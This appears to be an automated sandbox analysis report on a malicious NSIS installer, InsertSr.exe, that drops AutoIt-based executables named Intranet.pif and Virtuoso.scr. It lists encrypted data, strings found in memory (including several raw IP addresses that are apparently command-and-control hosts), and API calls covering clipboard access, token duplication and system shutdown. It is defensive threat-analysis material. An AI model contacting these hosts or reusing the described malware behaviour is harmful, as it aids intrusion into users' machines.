      Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
      Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK
      Source: Virtuoso.scr, 00000016.00000002.3383635119.000000000A122000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A10C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243
      Source: Intranet.pif, 00000013.00000002.3383490052.000000000A0E2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243X-Content-Type-OptionsP.
      Source: Intranet.pif, 00000013.00000002.3383490052.000000000A0EE000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F0000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A122000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A10C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243http://46.8.232.106
      Source: Virtuoso.scr, 00000016.00000002.3383635119.000000000A122000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A10C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106
      Source: Virtuoso.scr, 00000016.00000002.3383635119.000000000A10C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.236.61
      Source: Virtuoso.scr, 00000016.00000002.3383635119.000000000A10C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91
      Source: Virtuoso.scr, 00000016.00000002.3382375239.000000000A07A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91188.130.206.243:80P
      Source: Virtuoso.scr, 00000016.00000002.3383635119.000000000A10C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://93.185.159.253
      Source: Intranet.pif, 00000013.00000002.3383490052.000000000A0E2000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A12C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3382375239.000000000A07A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://93.185.159.253P
      Source: InsertSr.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: InsertSr.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: InsertSr.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: InsertSr.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: InsertSr.exe, 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp, InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1A4000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A156000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3382177878.000000000A064000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A191000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1B9000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F6000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A13E000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3384251154.000000000A1B6000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A13C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A14C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A12A000.00000004.00001000.00020000.00000000.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.dr | String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
      Source: InsertSr.exe, 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp, InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1A4000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A156000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3382177878.000000000A064000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A191000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1B9000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F6000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A13E000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3384251154.000000000A1B6000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A13C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A14C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A12A000.00000004.00001000.00020000.00000000.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: InsertSr.exe, 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp, InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1A4000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A156000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3382177878.000000000A064000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A191000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1B9000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F6000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A13E000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3384251154.000000000A1B6000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A13C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A14C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A12A000.00000004.00001000.00020000.00000000.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: InsertSr.exe, 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp, InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1A4000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A156000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3382177878.000000000A064000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A191000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1B9000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F6000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A13E000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3384251154.000000000A1B6000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A13C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A14C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A12A000.00000004.00001000.00020000.00000000.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.dr | String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
      Source: InsertSr.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: InsertSr.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
      Source: InsertSr.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: InsertSr.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: InsertSr.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
      Source: InsertSr.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: InsertSr.exe | String found in binary or memory: http://ocsp.digicert.com0
      Source: InsertSr.exe | String found in binary or memory: http://ocsp.digicert.com0A
      Source: InsertSr.exe | String found in binary or memory: http://ocsp.digicert.com0C
      Source: InsertSr.exe | String found in binary or memory: http://ocsp.digicert.com0X
      Source: InsertSr.exe, 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp, InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1A4000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A156000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3382177878.000000000A064000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A191000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1B9000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F6000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A13E000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3384251154.000000000A1B6000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A13C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A14C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A12A000.00000004.00001000.00020000.00000000.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: InsertSr.exe, 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp, InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1A4000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A156000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3382177878.000000000A064000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A191000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1B9000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F6000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A13E000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3384251154.000000000A1B6000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A13C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A14C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A12A000.00000004.00001000.00020000.00000000.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.dr | String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
      Source: InsertSr.exe, 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp, InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1A4000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A156000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3382177878.000000000A064000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A191000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1B9000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F6000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A13E000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3384251154.000000000A1B6000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A13C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A14C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A12A000.00000004.00001000.00020000.00000000.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: InsertSr.exe, 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp, InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1A4000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A156000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3382177878.000000000A064000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A191000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1B9000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F6000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A13E000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3384251154.000000000A1B6000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A13C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A14C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A12A000.00000004.00001000.00020000.00000000.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: InsertSr.exe, 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp, InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1A4000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A156000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3382177878.000000000A064000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A191000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1B9000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F6000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A13E000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3384251154.000000000A1B6000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A13C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A14C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A12A000.00000004.00001000.00020000.00000000.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
      Source: InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000000.2154258238.0000000000569000.00000002.00000001.01000000.00000007.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Virtuoso.scr, 00000011.00000000.2289162050.0000000000249000.00000002.00000001.01000000.00000009.sdmp, Intranet.pif, 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp, Virtuoso.scr, 00000016.00000000.2724020520.0000000000249000.00000002.00000001.01000000.00000009.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: InsertSr.exe | String found in binary or memory: http://www.digicert.com/CPS0
      Source: InsertSr.exe, 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp, InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1A4000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A156000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3382177878.000000000A064000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A191000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1B9000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F6000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A13E000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3384251154.000000000A1B6000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A13C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A14C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A12A000.00000004.00001000.00020000.00000000.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.dr | String found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: Virtuoso.scr.11.dr | String found in binary or memory: https://www.globalsign.com/repository/0
      Source: InsertSr.exe, 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp, InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1A4000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A156000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3382177878.000000000A064000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A191000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1B9000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F6000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A13E000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3384251154.000000000A1B6000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A13C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A14C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A12A000.00000004.00001000.00020000.00000000.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.dr | String found in binary or memory: https://www.globalsign.com/repository/06
      Source: C:\Users\user\Desktop\InsertSr.exe | Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_00514830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001F4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_00514632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
      Source: C:\Users\user\Desktop\InsertSr.exe | Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_0052D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_0020D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

      System Summary

      Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_00504254: CreateFileW,DeviceIoControl,CloseHandle
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004F8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
      Source: C:\Users\user\Desktop\InsertSr.exe | Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_00505778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr | Code function: 22_2_001E5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
      Source: C:\Users\user\Desktop\InsertSr.exe | File created: C:\Windows\MatthewSouthern
      Source: C:\Users\user\Desktop\InsertSr.exe | File created: C:\Windows\CombinedStarts
      Source: C:\Users\user\Desktop\InsertSr.exe | File created: C:\Windows\PastDesigns
      Source: C:\Users\user\Desktop\InsertSr.exe | File created: C:\Windows\InterestedHobbies
      Source: C:\Users\user\Desktop\InsertSr.exe | File created: C:\Windows\ChancellorFuneral
      Source: C:\Users\user\Desktop\InsertSr.exe | Code function: 0_2_0040497C
      Source: C:\Users\user\Desktop\InsertSr.exe | Code function: 0_2_00406ED2
      Source: C:\Users\user\Desktop\InsertSr.exe | Code function: 0_2_004074BB
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004C23F5
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_00528400
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004D6502
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004D265E
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004AE6F0
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004C282A
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004D89BF
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_004D6A74
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pif | Code function: 19_2_00520A3A
